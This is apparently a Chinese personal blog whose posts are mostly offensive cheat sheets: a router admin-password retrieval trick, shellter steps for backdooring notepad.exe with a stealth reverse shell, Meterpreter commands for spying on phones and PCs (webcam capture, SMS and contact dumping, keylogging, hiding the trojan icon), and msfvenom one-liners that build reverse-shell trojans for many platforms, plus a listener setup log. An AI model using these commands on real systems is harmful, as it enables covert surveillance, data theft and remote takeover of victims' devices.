自由天空 my sky

河北联通光猫密码忘记

Fri, 06 Feb 2026 12:37:38 +0800

联通光猫型号: 吉比特GPON/4+1+WiFi2.5 本文详细介绍如何通过下载并解析光猫配置文件来获取管理员密码的过程。适用于吉比特GPON/4+1+WiFi(2.4G)型号的联通光猫。按步骤操作，即可轻松登录管理员账号。联通光猫型号: 吉比特GPON/4+1+WiFi(2.4G) image.png 第一，先用你的普通帐号登录（猫的后面板上写的user+默认密码）然后再在浏览器地址栏里输入：http://192.168.1.1/backupsettings.conf，按下回车键后，将会把这个配置文件下载下来，这个配置文件就是光猫的配置文件，里面包含了管理员密码，我们下载完毕后，直接用记事本的方式将其打开，然后在里面搜索AdminPassword，找到后，位于<AdminPassword>和</AdminPassword>之间的部分就是管理员密码了，一般为CUAdmin+八位数字，比如CUAdmin12345678。找到密码之后，就可以登陆管理员帐号了。

shellter

Mon, 24 Nov 2025 22:34:17 +0800

Choose Operation Mode - Auto/Manual (A/M/H)：A //选择模式 A 自动模式自动注入后门，M高级模式，H帮助

PE Target：/home/notepad.exe // 注入的程序这里已windows系统自带的32位记事本程序举例

Enable Stealth Mode? (Y/N/H): Y //是否启用隐身模式输入Y启用

Use a listed payload or custom? (L/C/H): L //使用攻击模块列表或者自定义？输入L 选择Payload

Select payload by index: 1 //选择第一个

SET LHOST： 192.168.37.137 //设置反弹回来的IP 本机

SET LPORT：4444 //设置接收反弹的端口

开始安装：

1. apt-get update //更新一下

2. apt-get install shellter //直接apt在线安装

msf命令大全

Mon, 24 Nov 2025 22:03:37 +0800

手机类：

5.查看手机信息 sysinfo

6.查看手机有多少个摄像头 webcam_list 7.摄像头拍照 webcam_snap webcam_snap -i 2

7.开启摄像头 webcam_stream webcam_stream -i 2

8.导出电话号码 dump_contacts

9.导出短信信息 dump_sms

10.通过摄像头拍照功能 webcam_snap

hide_app_icon //隐藏手机端木马程序图标

dump_calllog //获取通话记录

geolocate //获取手机的当前的经纬度

set_audio_mode //Set Ringer Mode

sqlite_query //Query a SQLite database from storage

wakelock // Enable/Disable Wakelock

wlan_geolocate // Get current lat-long using WLAN information

app_install // Request to install apk file

app_list // List installed apps in the device

app_run // Start Main Activty for package name

app_uninstall //Request to uninstall application

windos类：

1. 获取系统信息

sysinfo：显示目标系统的详细信息，如操作系统类型、架构等。

2. 获取当前目录

pwd：显示当前工作目录。

3. 列出目录内容

ls 或 dir：列出当前目录下的文件和文件夹。

4. 切换目录

cd [路径]：切换到指定的目录。例如，cd Documents。

5. 文件操作

download [远程文件路径] [本地保存路径]：从目标系统下载文件到你的本地机器。例如，download C:\\Documents\\file.txt /path/to/save/file.txt。

upload [本地文件路径] [远程保存路径]：上传文件到目标系统。例如，upload /root/cs.exe C:\\Program Files (x86)\\Apache Software Foundation\\Tomcat 7.0\\cs.exe

6. 执行命令

execute -f [命令] 或 execute -H -f [命令]：在目标系统上执行命令。例如，execute -f notepad.exe（不带 -H 参数通常用于不需要交互的命令）。

7. 获取系统权限

getuid：显示当前用户的 ID。

getsystem：尝试提升权限到最高权限（需要适当的权限和配置）。

8. 网络功能

ipconfig：显示目标系统的网络配置。

portfwd [项] [本地端口] [远程主机] [远程端口]：在本地机器上设置端口转发，以便你可以访问远程系统上的服务。例如，portfwd add -l 4444 -p 445 -r 10.0.0.1。

9. 键盘记录器

keyscan_start：开始键盘记录。

keyscan_dump：显示记录的键盘输入。

keyscan_stop：停止键盘记录。

10. 退出 Meterpreter 会话

background：将当前会话置于后台，允许你继续使用 Metasploit 控制台。

exit 或 quit：退出 Meterpreter 会话并返回到 Metasploit 控制台。

msf-各种木马

Mon, 24 Nov 2025 21:59:12 +0800

msfvenom

Options:

-p, --payload < payload> 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload，请使用& #039;-& #039;或者stdin指定

-l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all

-n, --nopsled < length> 为payload预先指定一个NOP滑动长度

-f, --format < format> 指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)

-e, --encoder [encoder] 指定需要使用的encoder（编码器）

-a, --arch < architecture> 指定payload的目标架构

–platform < platform> 指定payload的目标平台

-s, --space < length> 设定有效攻击荷载的最大长度

-b, --bad-chars < list> 设定规避字符集，比如: & #039;\x00\xff& #039;

-i, --iterations < count> 指定payload的编码次数

-c, --add-code < path> 指定一个附加的win32 shellcode文件

-x, --template < path> 指定一个自定义的可执行文件作为模板

-k, --keep 保护模板程序的动作，注入的payload作为一个新的进程运行

–payload-options 列举payload的标准选项

-o, --out < path> 保存payload

-v, --var-name < name> 指定一个自定义的变量，以确定输出格式

–shellest 最小化生成payload

-h, --help 查看帮助选项

–help-formats 查看msf支持的输出格式列表

不同系统下生成木马的命令（在对方的操作系统中生成木马）

Linux

　　msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf

Windows

　　msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Mac

　　msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.machoWeb Payloads

PHP

　　msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP

　　msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP

　　msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

WAR

　　msfvenom -p java/jsp_shell_reverse_tcp LHOST=120.55.844.64 LPORT=9200 -f war > sh.war

Scripting Payloads

Python

　　msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash

　　msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl

　　msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

实验记录：

本机ip:192.168.0.109

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.109 lport=4444 -f exe > shell.exe

//host是攻击者也就是我的ip地址

msfconle 打开metasploit软件

msf > use exploit/multi/handler

Msf exploit(handler) > set payload java/jsp_shell_reverse_tcp

msf exploit(handler) > show options

msf exploit(handler) > set lhost 192.168.1.16

msf exploit(handler) > set lport 9200

msf exploit(handler) > exploit

大家好·小站今天上线啦！

Thu, 19 Apr 2018 17:48:08 +0800

,大家好·小站今天上线啦！